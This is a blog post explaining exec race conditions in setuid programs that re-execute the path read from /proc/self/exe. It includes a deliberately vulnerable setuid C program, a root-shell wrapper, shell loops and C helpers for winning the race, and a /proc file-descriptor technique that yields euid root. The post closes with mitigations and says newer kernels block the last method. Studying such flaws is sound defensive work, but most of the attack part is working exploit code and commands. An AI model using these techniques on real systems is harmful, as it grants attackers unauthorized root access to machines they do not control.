Saturday, November 06, 2010

Exec race condition exploitations

I recently learned a cool technique for exploiting exec race conditions. It was mentioned in a comment by Julien Tinnes about the 2009 pulseaudio vulnerability in Linux, and more recently by Tavis Ormandy (@taviso) about the vulnerability in the GNU C library dynamic linker, which expands $ORIGIN in the library search path of setuid programs. I am sure many people have known this for ages, but it was new to me and I thought it was worth a small post.

In short

Consider the pulseaudio case, which can be reduced to:
  • file is setuid
  • readlink("/proc/self/exe", buf, sizeof(buf))
  • later, execve(buf, .., ..)
We have a race condition between the moment the program starts (with the owner's uid) and the moment it reads the /proc/self/exe symlink via the readlink() syscall and executes the result again via the execve() syscall.

This race condition can be exploited if you are able to change the value the /proc/self/exe symlink points to, right after the program starts and before it calls readlink(). You can do that by creating a hardlink to the program in a directory you own and running the program through it, then deleting the hardlink and placing your own program within the race window. A symlink will not work here: execve() resolves it before execution, so /proc/self/exe would point to the actual program (which you cannot, or do not want to, delete).

Proof of concept

Consider the following vulnerable program:
#include <unistd.h>
int main(int argc, char **argv, char **envp)
{
  char buf[4096];
  /* do some stuff, and a check if we require new execution */
  if (argc < 2) {
    /* readlink() does not null-terminate the buffer, so do it ourselves */
    ssize_t n = readlink("/proc/self/exe", buf, sizeof(buf) - 1);
    if (n < 0) return 1;
    buf[n] = '\0';
    char *args[] = { buf, "1", 0 };
    if (execve(args[0], args, 0) < 0) return 1;
  }
  /* do some stuff */
  return 0;
}
Make it owned by root and give it the setuid bit:
$ gcc -Wall -o vulnerable vulnerable.c
$ sudo chown root: vulnerable
$ sudo chmod u+s vulnerable
$ ls -l
total 12
-rwsr-xr-x 1 root   root   6961 Nov  1 03:38 vulnerable
-rw-r--r-- 1 stalkr stalkr  447 Nov  1 03:38 vulnerable.c

Exploit 1: classic race exploitation

On systems where sh is linked to bash, we need a small wrapper that sets our uid to our euid (setuid(geteuid())), because bash drops privileges when the two differ. The wrapper also helps with the classic exploitation of the race condition by exiting immediately if it has not reached the target uid. Here is the wrapper:
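#include <stdlib.h>
#include <unistd.h>
int main()
{
  if (geteuid() != 0) exit(1);        /* race lost: exit so the loop retries */
  if (setuid(geteuid()) < 0) exit(1); /* uid = euid, so bash keeps root */
  char *args[] = { "/bin/sh", 0 };
  return execve(args[0], args, 0);
}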
$ gcc -Wall -o wrapper wrapper.c
Then open two shells. In the first shell, prepare the race with a loop that creates a hardlink to the vulnerable program, then replaces it with your program under the same filename (I use a hardlink for that too, but it is not a requirement):
$ while :; do ln -f ./vulnerable poc; ln -f ./wrapper poc; done
In the second shell, just run the hardlink. We will use nice to lower the priority of the process and raise our chances for the race condition to be triggered:
$ while :; do nice -n 20 ./poc; done
Just wait and the shell should appear eventually, but it can take a long time.
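
The swapping half of this race can also be written in C. The following is only a sketch under assumptions: swap_link is a hypothetical helper name, and the ".tmp" suffix for the temporary link is my own choice. It links the source under a temporary name and then renames it over the destination, so the destination name never disappears between two swaps.

```c
#include <errno.h>
#include <stdio.h>
#include <unistd.h>

/* Make `dst` a hardlink to `src` (both must be on the same filesystem).
 * Returns 0 on success, -1 on error with errno set. */
int swap_link(const char *src, const char *dst)
{
  char tmp[4096];
  int n = snprintf(tmp, sizeof(tmp), "%s.tmp", dst);
  if (n < 0 || (size_t)n >= sizeof(tmp)) { errno = ENAMETOOLONG; return -1; }

  /* remove a stale temporary name; a missing one is not an error */
  if (unlink(tmp) < 0 && errno != ENOENT) return -1;
  if (link(src, tmp) < 0) return -1;

  /* rename() replaces dst in one step, so dst always names some file */
  int rc = rename(tmp, dst);
  int saved = errno;
  /* tmp is still there if rename() failed or dst already was src */
  unlink(tmp);
  errno = saved;
  return rc;
}
```

Calling swap_link("./vulnerable", "poc") and swap_link("./wrapper", "poc") alternately in a loop mirrors the first shell loop above.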

To exploit this race reliably, we need to find a way to stop the execution of the process before its main(). That's the challenge Julien Tinnes gave to his readers, and I will repeat the two known solutions here.

Exploit 2: fill blocking pipes

I will just quote the answer comment by Julien Tinnes:

"So yeah, this is it, the LD_DEBUG trick still works. You set LD_DEBUG to a bogus value and then you exhaust a pipe like usual and dup2 it to the child's stderr. It solves the part where the parent has to wait for the child to be ready.
And to guarantee that the parent will not perform a certain action before the child is inside execve(), I used vfork().
So the LD_DEBUG trick + vfork() was our "old school" solution and Dividead was the first to find and report to us this solution (at least the first part)."

Indeed, Dividead has written a very good post about it on his blog, with exploit code.
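
To make the "exhaust a pipe" step from the quote concrete, here is a minimal sketch in C. It is not taken from the exploit code mentioned above: make_full_pipe is a hypothetical helper, and it only covers filling the pipe, not the LD_DEBUG or vfork() parts.

```c
#include <errno.h>
#include <fcntl.h>
#include <unistd.h>

/* Create a pipe and fill it until not even one more byte fits.
 * On success returns the number of bytes stored; fds[0] is the read end
 * and fds[1] the write end, back in blocking mode. Returns -1 on error. */
long make_full_pipe(int fds[2])
{
  char chunk[4096] = { 0 };
  size_t len = sizeof(chunk);
  long total = 0;

  if (pipe(fds) < 0) return -1;
  int flags = fcntl(fds[1], F_GETFL);
  if (flags < 0 || fcntl(fds[1], F_SETFL, flags | O_NONBLOCK) < 0) goto fail;

  for (;;) {
    ssize_t n = write(fds[1], chunk, len);
    if (n > 0) { total += n; continue; }
    if (n < 0 && errno == EINTR) continue;
    /* no room for a full chunk: top up byte by byte */
    if (n < 0 && errno == EAGAIN && len > 1) { len = 1; continue; }
    if (n < 0 && errno == EAGAIN) break;  /* the pipe is full */
    goto fail;
  }

  /* restore blocking mode: the next writer will sleep inside write() */
  if (fcntl(fds[1], F_SETFL, flags) < 0) goto fail;
  return total;

fail:
  close(fds[0]);
  close(fds[1]);
  return -1;
}
```

Following the quote, the write end would then be dup2()'ed onto the child's stderr before execve(), so that anything the child writes to stderr blocks until the parent reads from fds[0].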

Exploit 3: use /proc file descriptors

Create the hardlink, then open a file descriptor in the current shell to it:
$ ln vulnerable poc
$ exec 3< ./poc
$ ls -l /proc/$$/fd/3
lr-x------ 1 stalkr stalkr 64 Nov  1 03:39 /proc/2074/fd/3 -> /home/stalkr/poc
It is important to realize that at this point the program has not been started. We only hold a file descriptor to it, and the file behind that descriptor still carries its root owner and setuid bit.

Now we delete our hardlink to the setuid program:
$ rm -f poc
Now if you check the file descriptor, its destination should have " (deleted)" appended and the link is broken:
$ ls -l /proc/$$/fd/3
lr-x------ 1 stalkr stalkr 64 Nov  1 03:39 /proc/2074/fd/3 -> /home/stalkr/poc (deleted)
On some kernels the destination does not change; you only see that the link is broken if you enable ls colors (green is ok, red is broken).
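
The same check can be done from C instead of ls. This is a small sketch under assumptions: fd_link_target and has_deleted_suffix are hypothetical helper names, and the " (deleted)" suffix is the kernel behavior shown above, which as noted may differ between kernels.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Read where /proc/self/fd/<fd> points and null-terminate the result.
 * Returns the target length, or -1 on error or possible truncation. */
ssize_t fd_link_target(int fd, char *buf, size_t size)
{
  char link_path[64];
  if (size < 2) return -1;
  snprintf(link_path, sizeof(link_path), "/proc/self/fd/%d", fd);
  ssize_t n = readlink(link_path, buf, size - 1);
  if (n < 0 || (size_t)n >= size - 1) return -1;
  buf[n] = '\0';
  return n;
}

/* Returns 1 if `target` ends with the " (deleted)" marker, else 0. */
int has_deleted_suffix(const char *target)
{
  const char *marker = " (deleted)";
  size_t tl = strlen(target), ml = strlen(marker);
  return tl >= ml && strcmp(target + tl - ml, marker) == 0;
}
```

Calling fd_link_target() on an open descriptor before and after unlinking the file shows whether the running kernel appends the marker.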

Then just place the program you want at this destination. Here I will just use a setuid(geteuid)+execve(/bin/sh) wrapper.
$ mv wrapper 'poc (deleted)'
On kernels where the fd symlink has not changed its destination, you just have to rename the wrapper to poc instead.

The final step is to execute the program. We do that with the shell built-in exec on the file descriptor, which calls execve() on /proc/$$/fd/3. But remember, this file descriptor refers to a file with root owner and setuid bit, so it executes the vulnerable program (still on disk, because we only deleted a hardlink) with these properties. The vulnerable program then re-executes the path it reads from /proc/self/exe, which now names our program, and we finally get euid root:
$ exec /proc/$$/fd/3
sh-4.1# id
uid=0(root) gid=1000(stalkr) groups=0(root),1000(stalkr)
Race won in one shot!
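
For reference, the shell's exec on /proc/$$/fd/3 boils down to an execve() on a /proc fd path. Here is a minimal C sketch of that step, under assumptions: run_via_fd is a hypothetical helper, and it forks so that the caller survives, whereas the shell built-in replaces the shell itself.

```c
#include <fcntl.h>
#include <stdio.h>
#include <sys/wait.h>
#include <unistd.h>

/* Open `path`, then execute it in a child through /proc/self/fd/<fd>.
 * Returns the child's exit status, or -1 on error. */
int run_via_fd(const char *path, char *const argv[])
{
  char link_path[64];
  int fd = open(path, O_RDONLY);
  if (fd < 0) return -1;
  snprintf(link_path, sizeof(link_path), "/proc/self/fd/%d", fd);

  pid_t pid = fork();
  if (pid < 0) { close(fd); return -1; }
  if (pid == 0) {
    char *const envp[] = { 0 };
    /* the kernel follows this link to the opened file itself,
     * whatever has happened to the file's name since open() */
    execve(link_path, argv, envp);
    _exit(127);  /* only reached if execve() failed */
  }

  close(fd);
  int status;
  if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status)) return -1;
  return WEXITSTATUS(status);
}
```

Because the descriptor is opened before the name is removed, the file can still be executed this way after its hardlink has been deleted, which is the property the exploit relies on.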

Update: on newer kernels, this exploitation technique is no longer usable because the deleted file is reported as "(deleted) /path/to/file".


I very much liked the last technique using /proc and a file descriptor. I hope I did not say anything wrong; if I did, feel free to correct me.

As for mitigations, in addition to protecting your /tmp with the nosuid or noexec mount options, you can consider keeping your setuid binaries on a different filesystem from the directories users can write to. That prevents hardlinking them, because by definition a hardlink can only exist on the same filesystem as its target.


  1. really nice!
    didn't know about such exec behaviour

  2. Great info!! Thanks for showme how race condition works =)